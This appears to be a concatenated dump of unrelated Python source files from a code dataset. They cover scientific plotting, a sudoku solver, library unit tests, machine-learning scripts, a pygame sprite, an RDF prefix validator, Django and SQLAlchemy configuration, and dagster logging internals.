            # fields[1] is deliberately skipped (not part of the counts).
            parsed.append((fields[0], [int(c) for c in fields[2:]]))
    return parsed
def med(x):
    """Return the median of sequence *x* as a float.

    Bug fix: the original indexed with ``length / 2``, which is a float on
    Python 3 and raises TypeError; integer floor division ``//`` behaves
    identically on Python 2 and fixes Python 3.
    """
    ordered = sorted(x)
    length = len(ordered)
    if not length % 2:
        # Even count: average the two middle elements.
        return (ordered[length // 2] + ordered[(length - 1) // 2]) / 2.0
    return float(ordered[length // 2])
def plot_sd(data):
    """Bar-plot the per-residue standard deviation of contributions.

    *data* is the transposed form built in main(): data[0] holds the residue
    names, data[1] the corresponding rows of per-frame counts.
    """
    x = numpy.array([i+1 for i in range(len(data[0]))])
    d = numpy.std(data[1], axis=1)  # std across frames, one value per residue
    pyplot.bar(x, d)
    pyplot.xticks(x+.5, data[0], rotation=90)  # center labels under the bars
    ylim = pyplot.ylim()
    pyplot.ylim((ylim[0]-10, ylim[1]+10))  # add vertical headroom
    pyplot.xlim((x[0]-1, x[-1]+1))
    pyplot.subplots_adjust(left=0.1, right=0.9, top=0.95, bottom=0.2)
    pyplot.title("Residue contribution standard deviations")
def plot_barplot(data):
    """Draw one box per residue showing its contribution distribution.

    NOTE(review): despite the name, this draws a *boxplot*, not a bar plot.
    *data* is the transposed form built in main() (names, count rows).
    """
    x = [i+1 for i in range(len(data[0]))]
    pyplot.boxplot(data[1])
    pyplot.xticks(x, data[0], rotation=90)
    ylim = pyplot.ylim()
    pyplot.ylim((ylim[0]-10, ylim[1]+10))  # add vertical headroom
    pyplot.subplots_adjust(left=0.1, right=0.9, top=0.95, bottom=0.2)
    pyplot.title("Residue contribution")
def plot_residues(data, residues):
    """Plot the contribution time series of the requested residues.

    *residues* is a list of residue names, or ["all"] for every residue.
    An unknown residue name aborts the program via die().
    """
    def running_average(x, N):
        # Kept for reference; currently unused (see commented call below).
        return numpy.convolve(x, numpy.ones((N,))/N)[(N-1):]
    if "all" in residues:
        residues = data[0]
    for r in residues:
        try:
            i = data[0].index(r)
        except ValueError:
            # Bug fix: the original bare `except:` also swallowed
            # KeyboardInterrupt/SystemExit; list.index raises ValueError.
            die("No residue named '{0}'".format(r))
        # y = running_average(data[1][i], 5)
        y = data[1][i]
        pyplot.plot(y, label=r)
    pyplot.legend(loc="best")
def main():
    """Entry point: parse arguments, load contributions, draw the plot."""
    args = parse_args()
    data = read_contrib(args.filename)
    if args.n:
        # Keep only the n residues with the greatest median contribution.
        data = sorted(data, key=lambda x: med(x[1]), reverse=True)
        data = data[:args.n]
    # Transpose [(name, counts), ...] -> (names, count_rows). Wrapping in
    # list() keeps the result indexable on Python 3, where zip is lazy;
    # it is a no-op on Python 2.
    data = list(zip(*data))
    if args.r:
        plot_residues(data, args.r)
    elif args.stdev:
        plot_sd(data)
    else:
        plot_barplot(data)
    if args.output:
        pyplot.savefig(args.output)
    else:
        pyplot.show()
|
7,906 | 67452f31a49f50cdb2555406287b31e53a994224 | #!/usr/local/bin/python3
def printGrid(grid):
    """Print each row of the grid on its own line, then a blank separator."""
    print("\n".join(str(row) for row in grid) + "\n")
def validFormatting(grid):
    """Check the grid is a 9x9 list of lists of ints in the range 0..9.

    Deliberately uses `type(...) is` (not isinstance) to reject subclasses
    such as bool, matching the original behaviour.
    """
    if type(grid) is not list or len(grid) != 9:
        return False
    for row in grid:
        if type(row) is not list or len(row) != 9:
            return False
        for cell in row:
            if type(cell) is not int or not (0 <= cell <= 9):
                return False
    return True
def validRows(grid):
    """Return True if no row of the 9x9 grid repeats a non-zero digit.

    Zeros mark empty cells and may repeat freely. Cleanup vs original:
    removed the unused `found_zero` variable and replaced the dict-as-set
    with a real set.
    """
    for row in range(9):
        seen = set()
        for col in range(9):
            value = grid[row][col]
            if value != 0:
                if value in seen:
                    return False
                seen.add(value)
    return True
def validCols(grid):
    """Return True if no column of the 9x9 grid repeats a non-zero digit.

    Zeros mark empty cells and may repeat freely. Cleanup vs original:
    removed the unused `found_zero` variable, used a real set, and made the
    row bound a consistent 9 (the original mixed `range(9)` and
    `range(len(grid))`; both assume a 9x9 grid).
    """
    for col in range(9):
        seen = set()
        for row in range(9):
            value = grid[row][col]
            if value != 0:
                if value in seen:
                    return False
                seen.add(value)
    return True
def validBoxes(grid):
    """Return True if no 3x3 box of the 9x9 grid repeats a non-zero digit.

    Zeros mark empty cells and may repeat freely. Cleanup vs original:
    the hard-coded table of nine start positions is replaced by stepping
    both axes in strides of 3, and the dict-as-set by a real set.
    """
    for box_row in range(0, 9, 3):
        for box_col in range(0, 9, 3):
            seen = set()
            for r in range(3):
                for c in range(3):
                    value = grid[box_row + r][box_col + c]
                    if value != 0:
                        if value in seen:
                            return False
                        seen.add(value)
    return True
def getOpenSpot(grid):
    """Return the (row, col) of the first empty cell (value 0), scanning
    left-to-right, top-to-bottom; None when the grid is full."""
    for r, row in enumerate(grid):
        for c, value in enumerate(row):
            if value == 0:
                return (r, c)
    return None
def checkInRow(grid, row, num):
    """Return True when *num* already appears anywhere in the given row."""
    return num in grid[row]
def checkInCol(grid, col, num):
    """Return True when *num* already appears anywhere in the given column."""
    return any(grid[r][col] == num for r in range(9))
def checkInBox(grid, startRow, startCol, num):
    """Return True when *num* appears in the 3x3 box whose top-left corner
    is (startRow, startCol)."""
    return any(num in grid[startRow + r][startCol:startCol + 3]
               for r in range(3))
def checkIsOkay(grid, row, col, val):
    """Return True when placing *val* at (row, col) breaks no sudoku rule.

    Guard-clause form: bail out as soon as any constraint is violated
    (the three checks are side-effect free, so short-circuiting is safe).
    """
    if checkInRow(grid, row, val):
        return False
    if checkInCol(grid, col, val):
        return False
    # Snap (row, col) to the top-left corner of its 3x3 box.
    return not checkInBox(grid, row - row % 3, col - col % 3, val)
def validGrid(grid):
    """Validate a whole grid.

    Returns None for malformed input, True when all rows/columns/boxes are
    duplicate-free, False otherwise.
    """
    if not validFormatting(grid):
        return None
    return validRows(grid) and validCols(grid) and validBoxes(grid)
def solveSudoku(grid):
    """Solve the grid in place by backtracking.

    Returns True when a complete solution was reached (grid filled in),
    False when the current partial grid admits no solution.
    """
    spot = getOpenSpot(grid)
    if spot is None:
        return True  # no empty cell left: solved
    row, col = spot
    for candidate in range(1, 10):
        if not checkIsOkay(grid, row, col, candidate):
            continue
        grid[row][col] = candidate
        if solveSudoku(grid):
            return True
        grid[row][col] = 0  # undo and try the next candidate
    return False
|
7,907 | 13c0af340c4fff815919d7cbb1cfd3116be13771 | ##############################################################################
#
# Copyright (c) 2003 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Test the hookable support Extension
"""
import unittest
def return_foo():
    """Canned hook implementation used by the tests below."""
    return 'FOO'
def return_bar():
    """Second canned hook implementation, distinguishable from return_foo."""
    return 'BAR'
def not_called():
    """Guard implementation: fails the test if it is ever invoked."""
    raise AssertionError("This should not be called")
class PyHookableMixin:
    """Mixin whose _callFUT always exercises the pure-Python implementation."""
    def _callFUT(self, *args, **kw):
        from zope.hookable import _py_hookable
        return _py_hookable(*args, **kw)
class HookableMixin:
    """Mixin whose _callFUT exercises the default (possibly C) implementation.

    Skips when the default `hookable` IS the pure-Python one, so the same
    implementation is not tested twice.
    """
    def _callFUT(self, *args, **kw):
        from zope.hookable import _py_hookable
        from zope.hookable import hookable
        if hookable is _py_hookable:
            raise unittest.SkipTest("Hookable and PyHookable are the same")
        return hookable(*args, **kw)  # pragma: no cover
class PyHookableTests(PyHookableMixin,
                      unittest.TestCase):
    """Behavioural tests for hookable objects, run via the pure-Python path."""

    def test_pure_python(self):
        # The module default must follow the _PURE_PYTHON switch.
        from zope.hookable import _PURE_PYTHON
        from zope.hookable import _c_hookable
        from zope.hookable import _py_hookable
        from zope.hookable import hookable
        self.assertIs(hookable, _py_hookable if _PURE_PYTHON else _c_hookable)

    def test_before_hook(self):
        # Before any sethook(), original and implementation coincide.
        hooked = self._callFUT(return_foo)
        self.assertIs(hooked.original, return_foo)
        self.assertIs(hooked.implementation, return_foo)
        self.assertEqual(hooked(), 'FOO')

    def test_after_hook(self):
        # sethook() swaps the implementation but preserves .original.
        hooked = self._callFUT(not_called)
        old = hooked.sethook(return_bar)
        self.assertIs(old, not_called)
        self.assertIs(hooked.original, not_called)
        self.assertIs(hooked.implementation, return_bar)
        self.assertEqual(hooked(), 'BAR')

    def test_after_hook_and_reset(self):
        # reset() restores the original implementation.
        hooked = self._callFUT(return_foo)
        old = hooked.sethook(not_called)
        hooked.reset()
        self.assertIs(old, return_foo)
        self.assertIs(hooked.original, return_foo)
        self.assertIs(hooked.implementation, return_foo)
        self.assertEqual(hooked(), 'FOO')

    def test_original_cannot_be_deleted(self):
        hooked = self._callFUT(not_called)
        with self.assertRaises((TypeError, AttributeError)):
            del hooked.original

    def test_implementation_cannot_be_deleted(self):
        hooked = self._callFUT(not_called)
        with self.assertRaises((TypeError, AttributeError)):
            del hooked.implementation

    def test_no_args(self):
        with self.assertRaises(TypeError):
            self._callFUT()

    def test_too_many_args(self):
        with self.assertRaises(TypeError):
            self._callFUT(not_called, not_called)

    def test_w_implementation_kwarg(self):
        # The sole positional argument may also be passed by keyword.
        hooked = self._callFUT(implementation=return_foo)
        self.assertIs(hooked.original, return_foo)
        self.assertIs(hooked.implementation, return_foo)
        self.assertEqual(hooked(), 'FOO')

    def test_w_unknown_kwarg(self):
        with self.assertRaises(TypeError):
            self._callFUT(nonesuch=42)

    def test_class(self):
        # Classes (not just functions) can be hooked.
        class C:
            pass
        hooked = self._callFUT(C)
        self.assertIsInstance(hooked(), C)
        hooked.sethook(return_bar)
        self.assertEqual(hooked(), 'BAR')
class TestIssue6Py(PyHookableMixin,
                   unittest.TestCase):
    # Make sphinx docs for hooked objects work.
    # https://github.com/zopefoundation/zope.hookable/issues/6
    # We need to proxy __doc__ to the original,
    # and synthesize an empty __bases__ and a __dict__ attribute
    # if they're not present.

    def _check_preserves_doc(self, docs):
        """Shared assertion: the hooked wrapper proxies __doc__."""
        self.assertEqual("I have some docs", docs.__doc__)
        hooked = self._callFUT(docs)
        self.assertEqual(hooked.__doc__, docs.__doc__)

    def test_preserves_doc_function(self):
        def docs():
            """I have some docs"""
        self._check_preserves_doc(docs)

    def test_preserves_doc_class(self):
        class Docs:
            """I have some docs"""
        self._check_preserves_doc(Docs)

    def test_empty_bases_function(self):
        # Functions have no __bases__; the wrapper synthesizes ().
        hooked = self._callFUT(return_foo)
        self.assertEqual((), hooked.__bases__)

    def test_empty_dict_function(self):
        hooked = self._callFUT(return_foo)
        self.assertEqual({}, hooked.__dict__)

    def test_bases_class(self):
        # Real class __bases__ are proxied, not replaced.
        class C:
            pass
        self.assertEqual(C.__bases__, (object,))
        hooked = self._callFUT(C)
        self.assertEqual(hooked.__bases__, (object,))

    def test_dict_class(self):
        class C:
            pass
        hooked = self._callFUT(C)
        self.assertEqual(hooked.__dict__, C.__dict__)

    def test_non_string_attr_name(self):
        # Specifically for the C implementation, which has to deal with this
        hooked = self._callFUT(return_foo)
        with self.assertRaises(TypeError):
            getattr(hooked, 42)
        with self.assertRaises(TypeError):
            hooked.__getattribute__(42)

    def test_unicode_attribute_name(self):
        # Specifically for the C implementation, which has to deal with this
        hooked = self._callFUT(return_foo)
        result = hooked.__getattribute__('__bases__')
        self.assertEqual(result, ())

    def test_short_name(self):
        # Specifically for the C implementation, which has to deal with this
        hooked = self._callFUT(return_foo)
        with self.assertRaises(AttributeError):
            hooked.__getattribute__('')
class HookableTests(HookableMixin, PyHookableTests):
    # Re-runs the whole Python test suite against the C implementation.
    pass
class TestIssue6(HookableMixin, TestIssue6Py):
    # Re-runs the issue-6 docs/introspection tests against the C implementation.
    pass
def test_suite():
    # Collect every TestCase in this module for the legacy test runner.
    return unittest.defaultTestLoader.loadTestsFromName(__name__)
|
7,908 | 84fb0e364ee3cd846148abfc9326f404f008c510 | # 내 풀이
# Copy sequence.protein.fasta verbatim into sequence.protein.2.fasta.
with open("sequence.protein.2.fasta", "w") as fw:
    with open("sequence.protein.fasta", "r") as fr:
        for line in fr:
            fw.write(line)

# Instructor's solution (kept commented out; note the stray ':' after the
# open() call would be a SyntaxError if this were uncommented):
# fr = open('sequence.protein.fasta','r'):
# lines=fr.readlines()
# seq_list=list()
# for line in lines:
|
7,909 | 1292b894b75676abec3f97a8854fe406787baf1d | # -*- coding: utf-8 -*-
"""
Created on Fri Dec 30 22:01:06 2016
@author: George
"""
# -*- coding: utf-8 -*-
"""
Created on Sat Dec 24 23:22:16 2016
@author: George
"""
import os
import clr
import numpy as np
clr.AddReference(os.getcwd() + "\\libs\\MyMediaLite\\MyMediaLite.dll")
from MyMediaLite import IO, RatingPrediction, Eval
from MyMediaLite import Random
from tools import timing as tim
class Base():
    """Common 5-fold cross-validation driver for MyMediaLite rating predictors.

    Subclasses set ``self.rec`` to a concrete RatingPrediction recommender.
    (Python 2 / IronPython code: note the print statements.)
    """

    def __init__(self):
        # Fix the MyMediaLite RNG so runs are reproducible.
        Random.set_Seed(1)

    def fit(self, DATASET, model_name, _):
        # Trains and evaluates self.rec on 5 pre-split train/test folds named
        # <DATASET>-f<k>-train.csv / <DATASET>-f<k>-test.csv.
        # Returns (fold_rmse, fold_mae, fold_time, 0, 0, 0); the trailing
        # zeros keep the return shape of sibling model classes.
        data_path = ".\\data\\" + DATASET + "\\"
        file_prefix = DATASET + "-f"
        file_train_suffix1 = "-train.csv"
        file_test_suffix = "-test.csv"
        fold_rmse = []
        fold_mae = []
        fold_time = []
        print self.rec.ToString()
        for cv_index in range(0, 5):
            train_data = IO.RatingData.Read(data_path + file_prefix + str(cv_index + 1) + file_train_suffix1)
            test_data = IO.RatingData.Read(data_path + file_prefix + str(cv_index + 1) + file_test_suffix)
            print data_path + file_prefix + str(cv_index + 1) + file_train_suffix1
            self.rec.Ratings = train_data
            tim.startlog('Training model')
            self.rec.Train()
            fold_time.append(tim.endlog('Done training model'))
            score = Eval.Ratings.Evaluate(self.rec, test_data)
            fold_rmse.append(score.get_Item("RMSE"))
            fold_mae.append(score.get_Item("MAE"))
        print model_name
        print "Mean RMSE: %.5f +- %.5f" % (np.array(fold_rmse, dtype=np.single).mean(), np.array(fold_rmse, dtype=np.single).std())
        print "Mean MAE: %.5f +- %.5f" % (np.array(fold_mae, dtype=np.single).mean(), np.array(fold_mae, dtype=np.single).std())
        return fold_rmse, fold_mae, fold_time, 0, 0, 0
class GlobalAverage(Base):
    # Baseline: predicts every rating as the global mean rating.
    def __init__(self):
        Base.__init__(self)
        self.rec = RatingPrediction.GlobalAverage()
class UserAverage(Base):
    # Baseline: predicts each rating as the user's mean rating.
    def __init__(self):
        Base.__init__(self)
        self.rec = RatingPrediction.UserAverage()
class ItemAverage(Base):
    # Baseline: predicts each rating as the item's mean rating.
    def __init__(self):
        Base.__init__(self)
        self.rec = RatingPrediction.ItemAverage()
|
7,910 | efa94f8442c9f43234d56a781d2412c9f7ab1bb3 | # -*- coding: utf-8 -*-
"""
Created on Fri Nov 15 10:39:55 2019
@author: PC
"""
import pandas as pd

# Demo data: a dict of column name -> column values.
dictionary={"Name":["Ali","Buse","Selma","Hakan","Bülent","Yağmur","Ahmet"],
            "Age":[18,45,12,36,40,18,63],
            "Maas":[100,200,400,500,740,963,123]}

dataFrame1=pd.DataFrame(dictionary)  # builds an Excel-like table
head=dataFrame1.head()  # first 5 rows
tail=dataFrame1.tail()  # last 5 rows
print(dataFrame1.columns)
print(dataFrame1.info())
print(dataFrame1.dtypes)
print(dataFrame1.describe())
7,911 | 196147d7b2b0cf7176b5baa50d7e7618f88df493 | import tensorflow as tf
import csv
from tensorflow.keras import layers
from tensorflow.keras.layers.experimental import preprocessing
import pandas as pd
import numpy as np
import random
import matplotlib.pyplot as plt
import math
def plot_loss(history):
    """Plot training vs. validation loss curves from a Keras History object."""
    for series, label in (('loss', 'loss'), ('val_loss', 'val_loss')):
        plt.plot(history.history[series], label=label)
    plt.ylim([0, 10])
    plt.xlabel('Epoch')
    plt.ylabel('Error')
    plt.legend()
    plt.grid(True)
# --- Load data: one action row per message row, paired by index ------------
outputs=[]
inputs=[]
with open('C:\\Users\\owenb\\Desktop\\experiment results\\agent3_data\\actions.csv',newline='') as csvfile:
    reader=csv.reader(csvfile,dialect='excel')
    for x in reader:
        outputs.append(x)
with open('C:\\Users\\owenb\\Desktop\\experiment results\\agent3_data\\messages_3_2.csv',newline='') as csvfile:
    reader=csv.reader(csvfile,dialect='excel')
    for x in reader:
        inputs.append(x)
dataset=[[inputs[x],outputs[x]] for x in range(len(inputs))]
# Keep only the first 8500 pairs.
del dataset[8500:]
# --- 80/20 random split and conversion to float arrays of shape (N,1,k) ----
# NOTE(review): `y not in train_dataset` is O(n^2) and also drops duplicate
# rows from the test set entirely — confirm that is intended.
length=int(len(dataset)*0.8)
train_dataset=random.sample(dataset,length)
test_dataset=[y for y in dataset if y not in train_dataset]
train_features=[x[0] for x in train_dataset]
train_labels=[x[1] for x in train_dataset]
test_features=[x[0] for x in test_dataset]
test_labels=[x[1] for x in test_dataset]
for x in range(len(train_features)):
    train_features[x]=np.array(np.expand_dims([float(y) for y in train_features[x]], axis=0))
    train_labels[x]=np.array(np.expand_dims([float(y) for y in train_labels[x]], axis=0))
train_features=np.array(train_features)
train_labels=np.array(train_labels)
for x in range(len(test_features)):
    test_features[x]=np.array(np.expand_dims([float(y) for y in test_features[x]], axis=0))
    test_labels[x]=np.array(np.expand_dims([float(y) for y in test_labels[x]], axis=0))
test_features=np.array(test_features)
test_labels=np.array(test_labels)
# --- Model: normalization + single dense layer (linear regression) ---------
#message=tf.keras.Input(shape=(1,100))
#predictor_layer=tf.keras.layers.Dense(6,activation='relu',use_bias=True)(message)
#linear_model=tf.keras.Model(inputs=message,outputs=predictor_layer)
normalizer=preprocessing.Normalization(input_shape=(1, 100))
normalizer.adapt(train_features)
linear_model=tf.keras.Sequential([normalizer,tf.keras.layers.Dense(6)])
linear_model.compile(optimizer=tf.optimizers.Adam(learning_rate=0.001),loss='mean_absolute_error')
# --- Train ------------------------------------------------------------------
history = linear_model.fit(x=train_features, y=train_labels, epochs=100,verbose=0,validation_split = 0.2)
plot_loss(history)
# --- Evaluate on the held-out split and save --------------------------------
test_results = linear_model.evaluate(test_features, test_labels, verbose=1)
print("agent 3-2 post train error="+str(test_results))
linear_model.save('agent3-2.h5')
|
7,912 | c01ea897cd64b3910531babe9fce8c61b750185d | import os
path = r'D:\python\风变编程\python基础-山顶班\fb_16'
path1 = 'test_01'
path2 = 'fb_csv-01-获取网页内容.py'
print(os.getcwd())  # current working directory
print(os.listdir(path))  # names of the files/folders inside `path`
#print(os.mkdir(path1))  # create a directory (disabled)
print(os.path.abspath(path))  # absolute form of `path`
print(os.path.basename(path))  # final path component
print(os.path.isfile(path2))  # True if `path2` is a regular file
print(os.path.isdir(path1))  # True if `path1` is a directory
7,913 | 65752c8ac50205df0fea105123935110e4a30aba | from math import pi
# Prompt for tire dimensions and report the approximate air volume in litres.
width = float(input("Enter the width of the tire in mm (ex 205): "))
aspectRatio = float(input("Enter the aspect ratio of the tire (ex 60): "))
diameter = float(input("Enter the diameter of the wheel in inches (ex 15): "))
# V = pi * w^2 * ar * (w*ar + 2540*d) / 1e10  (mm^3 scaled to litres)
approxVolume = (pi * (width ** 2) * aspectRatio * ((width * aspectRatio) + (2540 * diameter)))/10000000000
# Fixed typo in the user-facing message: "apporximate" -> "approximate".
print(f"The approximate volume is {approxVolume:.2f} liters")
7,914 | c589ce4ba2ae60d14787a8939146f6140fff1f01 | import pygame
import random
from pygame.locals import *
import pygame
from pygame.locals import *
class GameObject(pygame.sprite.Sprite):
    """Base sprite anchored at a board position (x, y) on *surface*."""

    SIZE = 8

    def __init__(self, x, y, surface):
        super(GameObject, self).__init__()
        self.x = x
        self.y = y
        self.surface = surface

    def getDistance(self, other):
        """Manhattan distance between this object and *other*."""
        horizontal = abs(self.x - other.x)
        vertical = abs(self.y - other.y)
        return horizontal + vertical

    def collide(self, main, other):
        """Collision hook; subclasses override with real behaviour."""
        pass
import gameobject
class Food(gameobject.GameObject):
    """A food pellet rendered as a blue circle on a transparent square."""

    def __init__(self, x, y, surface, time = random.randint(0, 50)):
        # NOTE(review): the default for `time` is evaluated once at import
        # time, so all calls relying on it share the same value; the
        # parameter is also never used here — confirm intent.
        super(Food, self).__init__(x,y,surface)
        self.dead = False
        self.SIZE = gameobject.GameObject.SIZE
        # Transparent square surface the circle is drawn onto.
        self.image = pygame.Surface((2*self.SIZE, 2*self.SIZE),
                                    flags = SRCALPHA)
        self.image.convert()
        self.rect = pygame.draw.circle(self.image,
                                       pygame.Color("blue"),
                                       (self.SIZE,self.SIZE), self.SIZE/2+2)
        self.rect.midtop = (x,y)

    def update(self):
        # No per-frame behaviour yet.
        pass
        # self.rect.midtop = (self.x, self.y)

    def collide(self, main, other):
        # First collision with anything other than itself marks it eaten.
        if not other == self and not self.dead:
            self.dead = True
|
7,915 | fe406f40b48bf4982e7a48737b6b30514ae1fa71 | #Checks if all declared prefixes are used in the RDF File
import glob
import logging
import sys
import Utility as utility
import re
# set log level
logging.basicConfig(level=logging.INFO)

root_path = "../"
# Extension -> rdflib parse format.
rdf_file_extension = {".ttl":"turtle", ".nt":"nt", ".rdf":"application/rdf+xml"}
# Per-extension regexes used to pull prefix declarations out of the raw text.
regex_prefix = {".ttl": r'@prefix(.*?)\n', ".rdf": r'xmlns:(.*?)\n'}
regex_url = {".ttl": r'\<(.*?)\>', ".rdf": r'\"(.*?)\"'}
regex_splitter = {".ttl": ":", ".nt":"nt", ".rdf":"="}

for extension in rdf_file_extension.keys() :
    files_to_check = "**/*" + extension
    for filename in glob.iglob(root_path + files_to_check, recursive=True):
        logging.info("Validating file " + filename)
        try:
            #Parse file using rdflib
            g = utility.parseGraph(filename, rdf_file_extension[extension])
            #Read File
            content = utility.readFile(filename)
            #Get Declared prefixes
            # NOTE(review): regex_prefix has no '.nt' key, so any .nt file
            # raises KeyError here and the except below exits — confirm.
            declared_prefixes = utility.getDeclaredPrefixesRegex(content, regex_prefix[extension], regex_url[extension], regex_splitter[extension])
            #Check redundant declaration
            duplicated_prefixes = utility.findDuplicates(declared_prefixes)
            #If redundant, raise exception
            if len(duplicated_prefixes) > 0:
                msg = utility.getErrorMessage(duplicated_prefixes)
                raise Exception("Duplicated prefix declaration: {}".format(msg))
            if(extension == '.ttl'):
                #Remove prefixes from content
                content = re.sub(r'@prefix(.*?)\n', '', content)
                #Check for prefix usage
                unused_prefixes = utility.getUnusedPrefixesRegex(declared_prefixes, content)
            elif(extension == '.rdf'):
                #Check for prefix usage
                used_prefixes = utility.getUsedPrefixesRDF(g)
                unused_prefixes = utility.getUnusedPrefixesRDF(declared_prefixes, used_prefixes)
            #If there are unused prefixes, raise exception
            if len(unused_prefixes) > 0:
                msg = utility.getErrorMessage(unused_prefixes)
                raise Exception("Unused prefixes:\n {}".format(msg))
        except Exception as e:
            # Any validation problem aborts the whole run with a non-zero exit.
            logging.error(e)
            logging.error("Syntaxic error reading turtle file [" +filename+"]")
            sys.exit(1)

print("Files syntaxic validation is successful")
7,916 | 98dac1ea372f16ecdb818fbe3287ab7e51a0d67c | from sqlalchemy import literal, Column, String, Integer, ForeignKey
from sqlalchemy.orm import relationship
from common.db import Base
class Airplane(Base):
    """An airframe identified by its ICAO 24-bit address, linked to an airline."""

    __tablename__ = 'airplanes'

    id = Column(Integer, primary_key=True)
    icao_code = Column(String(6), unique=True, nullable=False) # ICAO 24-bit identifier
    airline_id = Column(Integer, ForeignKey('airlines.id'))
    airline = relationship('Airline', backref='airplanes')
    manufacturer = Column(String)
    model = Column(String)

    def __init__(self, icao_code, airline, manufacturer=None, model=None):
        self.icao_code = icao_code
        self.airline = airline
        self.manufacturer = manufacturer
        self.model = model

    def __repr__(self):
        return 'Airplane({icao_code}, {airline})'.format(
            icao_code=self.icao_code,
            airline=self.airline)

    @staticmethod
    def exists_airplane(session, icao_code):
        # EXISTS subquery: True if any airplane carries this ICAO code.
        q = session.query(Airplane).filter(Airplane.icao_code == icao_code)
        return session.query(literal(True)).filter(q.exists()).scalar()

    @staticmethod
    def airplane_from_icao_code(session, icao_code):
        # Returns the matching Airplane, or None when absent.
        return session.query(Airplane).filter(Airplane.icao_code == icao_code).first()
7,917 | 0df20722fba6223c9d4fc9f72bfb399b479db6ac | o = input()
# Read a 12x12 matrix of floats (one value per line) and report either the
# sum ('S') or the mean ('M') of the elements strictly below the diagonal.
v = [[float(input()) for _ in range(12)] for _ in range(12)]
s = sum(v[i][j] for i in range(1, 12) for j in range(i))
if o == 'S':
    print("%.1f"%s)
if o == 'M':
    print("%.1f"%(s/66))
|
7,918 | dd96b7f73c07bf0c74e6ce4dbff1a9cc09729b72 | from hicity.graphics.graphics import HiCityGUI
def GUI():
    """Create the HiCity Tk application and enter its main loop (blocks)."""
    app = HiCityGUI()
    app.mainloop()

if __name__ == '__main__':
    GUI()
|
7,919 | ead843f1edcfe798613effb049e3ca79dcd03b71 | # Generated by Django 3.2.4 on 2021-07-18 02:05
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
    """Creates the Result model: one free-text value attached to a Tracker."""

    initial = True

    dependencies = [
        ('tracker', '0003_auto_20210626_0735'),
    ]

    operations = [
        migrations.CreateModel(
            name='Result',
            fields=[
                ('uuid', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('created_date', models.DateTimeField(auto_now_add=True, db_index=True, null=True)),
                ('modified_date', models.DateTimeField(auto_now=True, db_index=True)),
                ('value', models.TextField(max_length=2000)),
                ('tracker', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tracker.tracker')),
            ],
            options={
                'abstract': False,
            },
        ),
    ]
7,920 | ee8bf681adcb07c4f79245c8f118131bbcabd2fa | num1 = input("첫 번째 실수 : ")
num2 = input("두 번째 실수 : ")
# input() returns str, so convert to float before adding.
print(float(num1) + float(num2))

# Same computation, converting at read time instead of at use time.
num1 = float(input("첫 번째 실수 : "))
num2 = float(input("두 번째 실수 : "))
print(num1 + num2)
|
7,921 | 786bc5d44115b46bd246e85e85c8f8c1f20737b9 | """config URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf import settings
from django.urls import include, path
from rest_framework import routers
from BugBytes import views
from django.conf.urls.static import static
# DRF router: exposes the three REST endpoints under /api/.
router = routers.DefaultRouter()
router.register(r'species', views.SpeciesViewSet)
router.register(r'com_names', views.Com_NamesViewSet)
router.register(r'photos', views.PhotosViewSet)

urlpatterns = [
    path('admin/', admin.site.urls),
    path('api/', include(router.urls)),
    path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),
    path('bugbytes/<int:tensorflow_id>/view_species',
         views.view_species, name='view_species'),
    path('', views.landing, name='landing'),
    path('model_json/', views.model_json, name='model_json'),
]
if settings.DEBUG:  # new
    # Serve uploaded media locally during development only.
    urlpatterns += static(settings.MEDIA_URL,
                          document_root=settings.MEDIA_ROOT)
|
7,922 | f900e08c06ae736f5e32ac748e282700f9d0a969 | import datetime
import logging
from typing import TYPE_CHECKING, Any, Dict, List, NamedTuple, Optional
from dagster import check
from dagster.core.utils import coerce_valid_log_level, make_new_run_id
if TYPE_CHECKING:
from dagster.core.events import DagsterEvent
DAGSTER_META_KEY = "dagster_meta"
class DagsterMessageProps(
    NamedTuple(
        "_DagsterMessageProps",
        [
            ("orig_message", Optional[str]),
            ("log_message_id", Optional[str]),
            ("log_timestamp", Optional[str]),
            ("dagster_event", Optional[Any]),
        ],
    )
):
    """Internal class used to represent specific attributes about a logged message"""

    def __new__(
        cls,
        orig_message: str,
        log_message_id: Optional[str] = None,
        log_timestamp: Optional[str] = None,
        dagster_event: Optional["DagsterEvent"] = None,
    ):
        # Defaults: a fresh run-id-style uuid and a UTC ISO timestamp, so
        # every message is individually addressable.
        return super().__new__(
            cls,
            orig_message=check.str_param(orig_message, "orig_message"),
            log_message_id=check.opt_str_param(
                log_message_id, "log_message_id", default=make_new_run_id()
            ),
            log_timestamp=check.opt_str_param(
                log_timestamp, "log_timestamp", default=datetime.datetime.utcnow().isoformat()
            ),
            dagster_event=dagster_event,
        )

    @property
    def error_str(self) -> Optional[str]:
        # Display string for the event's error (if any), prefixed with a
        # blank line so it renders below the log line; None when no error.
        if self.dagster_event is None:
            return None
        event_specific_data = self.dagster_event.event_specific_data
        if not event_specific_data:
            return None
        error = getattr(event_specific_data, "error", None)
        if error:
            return "\n\n" + getattr(event_specific_data, "error_display_string", error.to_string())
        return None

    @property
    def pid(self) -> Optional[str]:
        # Stringified so it can be joined straight into the log line.
        if self.dagster_event is None or self.dagster_event.pid is None:
            return None
        return str(self.dagster_event.pid)

    @property
    def step_key(self) -> Optional[str]:
        if self.dagster_event is None:
            return None
        return self.dagster_event.step_key

    @property
    def event_type_value(self) -> Optional[str]:
        if self.dagster_event is None:
            return None
